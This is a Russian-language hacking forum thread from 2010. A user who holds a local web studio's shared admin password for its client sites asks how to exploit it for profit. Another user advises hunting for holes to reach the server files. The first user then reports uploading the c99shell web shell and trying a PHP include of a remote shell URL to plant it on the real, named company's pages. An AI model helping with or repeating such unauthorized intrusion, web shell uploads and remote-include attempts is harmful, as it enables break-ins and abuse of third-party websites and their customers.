Что можно сделать?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Что можно сделать? - 2010-08-17 10:29:07.376666
|
|
|
Shandow
Сообщений: 48
Оценки: 0
Присоединился: 2008-01-11 17:01:17.716666
|
Доброго времени суток! Хотелось бы посоветоваться с умными головами. Есть у нас в городе компания http://flexites.org/ и есть на их сайте админка http://flexites.org/admin Есть и пароль к этой админке под логином admin Дальше интереснее. Как уже наверное стало понятно компания производит сайты для других компаний нашего городка. На тех сайтах такая же админка и точно такая же пара логин:пароль/ Создается впечатление что для всех сайтов компании используется одна таблица логинов Странно то что компания сдавая сайт заказчику дает только доступ к админке Через админку можно редактировать только контент… Смена дизайна - запрос в компанию, поменять какие то блоки местами - запрос в компанию Никакого вам ФТП доступа, никакого переноса сайта на свой хостинг (мотивируется это тем что при переносе сайта на др хостинг нужно будет установить движок отдельно а движок какой то модный на котором крутятся все сайты, поэтому они не хотят выдавать его клиентам). Вопрос… что со всем этим можно сделать и как получить с этого выгоду?
|
|
|
RE: Что можно сделать? - 2010-08-17 10:39:01.890000
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
Ну вероятно админка главного сайта такая же как и других и не содержит ниче интересного, так? или нет? Отсюда судить сложновато)) Не имея доступа к файлам (фтп или шелла) конкретного посоветовать нельзя. Если это самописный движок, то искать его исходники бесполезно. Следовательно надо искать дыры в существующем пространстве. Главная задача добраться до файлов, а там можно судить о том куда двигаться дальше. Думаю именно из-за того что обычно это (доступ к файлам) происходит после проникновения в админку, то и админку упростили до нельзя. Если очень охота насолить или получить что-либо то это в работу, если интерес лишь пользовательский то копайте, спрашивайте и снова копайте. Как ламать сайты можно прочитать в журнале на форуме которого вы находитесь.
|
|
|
RE: Что можно сделать? - 2010-08-17 10:44:54.153333
|
|
|
Shandow
Сообщений: 48
Оценки: 0
Присоединился: 2008-01-11 17:01:17.716666
|
В админке есть возможность закачки файлов, однако только картинок и флешек. Заливая вебшелл как картинку открыть его потом невозможно ибо он идет на скачивание. Как то можно заставить шелл заработать? или это жесткие настройки где то на сервере?
|
|
|
RE: Что можно сделать? - 2010-08-17 11:38:09.336666
|
|
|
Ltonid
Сообщений: 4970
Оценки: 740
Присоединился: 2008-12-29 13:21:56.166666
|
quote:
Как то можно заставить шелл заработать? или это жесткие настройки где то на сервере? Если сервер настраивали то да действительно это жесткие настройки. quote:
и флешек Это какой формат имеется ввиду? А то где то писали про шелл во флеше если не пропатчен плеер. quote:
В админке есть возможность закачки файлов А ты пробовал все? или там прост написано какие и ты поверил?
|
|
|
RE: Что можно сделать? - 2010-08-17 12:12:58.646666
|
|
|
Shandow
Сообщений: 48
Оценки: 0
Присоединился: 2008-01-11 17:01:17.716666
|
quote:
ORIGINAL: Ltonid quote:
Как то можно заставить шелл заработать? или это жесткие настройки где то на сервере? Если сервер настраивали то да действительно это жесткие настройки. quote:
и флешек Это какой формат имеется ввиду? А то где то писали про шелл во флеше если не пропатчен плеер. quote:
В админке есть возможность закачки файлов А ты пробовал все? или там прост написано какие и ты поверил? Флешки это Swf файлы… Счас загрузил c99shell.php Толку ноль файл есть при попытке перейти к нему выбрасывает на 404 страницу Вставка кода в страницу
<?
include 'http://******/c99shell.php';
?>
ни к чему не приводит. Вырезаются абсолютно все php вставки, даже безобидные echo
|
|
|
|
|